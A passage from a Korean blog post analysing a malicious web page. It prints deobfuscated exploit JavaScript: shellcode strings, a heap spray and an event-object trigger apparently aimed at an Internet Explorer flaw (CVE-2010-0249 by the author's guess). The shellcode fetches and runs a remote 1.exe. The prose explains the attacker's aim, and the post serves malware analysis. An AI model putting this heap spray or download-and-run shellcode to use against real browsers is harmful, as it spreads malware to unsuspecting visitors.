         s += YT("%uFEAB%uFFFF%uB5E9%uFFFC%uE8FF%uFFE8%uFFFF%uE8C3%uFDA9%uFFFF%u4F68%u4FEF%u5005%u3EE8%u0000%u8300%u08C4");
         s += YT("%uE8C3%u000F%u0000%u8E68%u0E4E%u50EC%u2AE8%u0000%u8300%u08C4%u33C3%u64C0%u408B%u8530%u78C0%u3E10%u408B");
         s += YT("%u3E0C%u708B%uAD1C%u8B3E%u0840%uEBC3%u3E0B%u408B%u8334%u7CC0%u8B3E%u3C40%u60C3%u8B36%u246C%u3624%u458B");
         s += YT("%u363C%u548B%u7828%uD503%u8B3E%u184A%u8B3E%u205A%uDD03%u3BE3%u3E49%u348B%u038B%u33F5%u33FF%uFCC0%u84AC");
         s += YT("%u74C0%uC107%u0DCF"+YUYttian+"%u5A8B%u0324%u66DD%u8B3E%u4B0C%u8B3E%u1C5A%uDD03");
         s += YT("%u8B3E%u8B04%uC503"+YTavp);
         
         var u = YT("%u7468%u7074%u2F3A%u712F%u7377%u7177%u6E2E%u7465%u312F%u652E%u6578%u0000");
         var sc = s + u;
         var n = unescape("%u0c0d%u0c0d");
         while (n.length<=524288) 
            n +=n ;
         
         n=n.substring(0, 524269 - sc.length);
         var x=new Array();
         for (var i=0 ; i < 200; i++) {
             x[i]=n + sc;
         }
         var x1=new Array();
         for (i=0 ; i < 500; i++) {
             x1[i]=document.createElement( "COMMENT");
             x1[i].data="abc" ;
         };
         
         var e1=null;
         function ev1(evt)
         {
             e1=document.createEventObject(evt);
             document.getElementById("sp1").innerHTML="" ;
             window.setInterval(ev2, 50);
         }
         function ev2()
         { 
            p="\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d";
             for (i=0 ; i < x1.length; i++)
             {
                 x1[i].data=p ;
             };
         var t=e1.srcElement;
         }
     }
     </script>
     <span id="sp1">
        <IMG SRC="ytl.gif" onload="ev1(event)">
     </span> 
      </body>
</html>

난독화를 해제하여 보았을 때 볼 수 있는 것은 바로 p 변수와 유니코드 입니다. 두 가지 정보만으로도 이 웹 기반 악성코드는 IE 취약점을 이용하여 악성코드를 유포하려고 한 것을 볼 수 있습니다.


split되어 있는 변수들을 합쳐 한줄의 unicode로 만들고, 이 unicode를 분석하면 다음과 같은 결과를 볼 수 있습니다.  결정적인건 u 변수에 저장된 unicode가 악성코드 보관소의 위치를 가리키고 있습니다.

........

00000400  01 00 00 83 c4 08 c3 e8 e3 00 00 00 68 7e d8 e2  |............h~..|

00000410  73 50 e8 fe 00 00 00 83 c4 08 c3 e8 cf 00 00 00  |sP..............|

00000420  68 9e f9 bb 35 50 e8 ea 00 00 00 83 c4 08 c3 e8  |h...5P..........|

00000430  92 fe ff ff 68 57 a0 b5 bb 50 e8 d6 00 00 00 83  |....hW...P......|

00000440  c4 08 c3 e8 7e fe ff ff 68 1a 7a 1e 02 50 e8 c2  |....~...h.z..P..|

00000450  00 00 00 83 c4 08 c3 e8 6a fe ff ff 68 e0 5b 30  |........j...h.[0|

00000460  94 50 e8 ae 00 00 00 83 c4 08 c3 e8 56 fe ff ff  |.P..........V...|

00000470  68 97 c9 e2 a3 50 e8 9a 00 00 00 83 c4 08 c3 e8  |h....P..........|

00000480  42 fe ff ff 68 68 24 c5 b3 50 e8 86 00 00 00 83  |B...hh$..P......|

00000490  c4 08 c3 e8 57 00 00 00 68 72 fe b3 16 50 e8 72  |....W...hr...P.r|

000004a0  00 00 00 83 c4 08 c3 e8 44 fe ff ff eb 13 6a 65  |........D.....je|

000004b0  50 e8 e0 fb ff ff 50 e8 ab fe ff ff e9 b5 fc ff  |P.....P.........|

000004c0  ff e8 e8 ff ff ff c3 e8 a9 fd ff ff 68 4f ef 4f  |............hO.O|

000004d0  05 50 e8 3e 00 00 00 83 c4 08 c3 e8 0f 00 00 00  |.P.>............|

000004e0  68 8e 4e 0e ec 50 e8 2a 00 00 00 83 c4 08 c3 33  |h.N..P.*.......3|

000004f0  c0 64 8b 40 30 85 c0 78 10 3e 8b 40 0c 3e 8b 70  |.d.@0..x.>.@.>.p|

00000500  1c ad 3e 8b 40 08 c3 eb 0b 3e 8b 40 34 83 c0 7c  |..>.@....>.@4..||

00000510  3e 8b 40 3c c3 60 36 8b 6c 24 24 36 8b 45 3c 36  |>.@<.`6.l$$6.E<6|

00000520  8b 54 28 78 03 d5 3e 8b 4a 18 3e 8b 5a 20 03 dd  |.T(x..>.J.>.Z ..|

00000530  e3 3b 49 3e 8b 34 8b 03 f5 33 ff 33 c0 fc ac 84  |.;I>.4...3.3....|

00000540  c0 74 07 c1 cf 0d 03 f8 eb f4 36 3b 7c 24 28 75  |.t........6;|$(u|

00000550  df 3e 8b 5a 24 03 dd 66 3e 8b 0c 4b 3e 8b 5a 1c  |.>.Z$..f>..K>.Z.|

00000560  03 dd 3e 8b 04 8b 03 c5 36 89 44 24 1c 61 c3 e8  |..>.....6.D$.a..|

00000570  4f fb ff ff 68 74 74 70 3a 2f 2f 2a 2a 2a 2a 2a  |O...http://*****|

00000580  2a 2a 2a 2a 2a 31 2e 65 78 65 00 00              |****/1.exe..|

IE 취약점을 이용하여 유포하려는 최종 악성코드 URL 주소를 볼 수 있습니다. 비록 실행되지 않은 난독화이지만 악성코드를 유포하려는 공격자의 목표를 알 수 있습니다. 취약점 CVE 넘버는 2010-0249로 추측됩니다.


* 실제 악성코드 유포하는 소스코드 중 샘플이기 때문에 일부 내용을 변경하였습니다.



  • 사랑을구걸하는거지 2013.06.19 21:26 신고 댓글주소 수정/삭제 댓글쓰기

    좋은 정보 감사합니다.

    " มี(UTF-8 문제로 ??로 표시됨)를 제거하는 구문이 존재하지 않음. 수동으로 제거. " 라고 하셨는데 해당 문자열을 삭제하지 않으면 코드가 정상적으로 실행이 되지 않는가요???

    • 안녕하세요.
      특수한 문자로 인해 실행이 안되는 것은 아닙니다. 스크립트 소스코드 자체에 문제가 존재합니다. ^^


티스토리 툴바